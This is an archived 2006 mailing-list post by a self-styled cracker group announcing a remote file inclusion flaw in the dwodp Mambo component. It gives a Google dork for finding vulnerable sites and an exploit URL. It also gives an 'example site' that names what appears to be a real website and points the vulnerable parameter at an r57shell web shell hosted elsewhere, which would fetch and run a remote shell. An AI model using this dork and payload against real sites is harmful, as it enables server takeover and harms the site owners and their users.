Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21517] OPT Max "CRM_inc" Parameter File Inclusion Vulnerability

[SA21519] Owl Intranet Engine Cross-Site Scripting and SQL Injection

[SA21454] phPay Open Mail Relay Vulnerability

[SA21484] Zen Cart SQL Injection and File Inclusion Vulnerabilities

From:	crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:	17.08.2006
Subject:	dwodp Mambo Component Remote File Include Vulnerabilities

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : dwodp Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------


Google Dorks  : inurl:"/com_dwodp/"

------------------------- -------------------------------------------------------

Application :  dwodp  Component of Mambo

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------


Exploit:

http://[target]/[mambo_path]/components/com_dwodp/dwodp.
php?mosConfig_absolute_path=

--------------------------------------------------------------------------------


greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------

Example Site = http://www.hannover-plus.de/components/com_dwodp/dwodp.php?mosConfig_absolute_pat
h=http://www.rst.void.ru/download/r57shell.txt?



--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------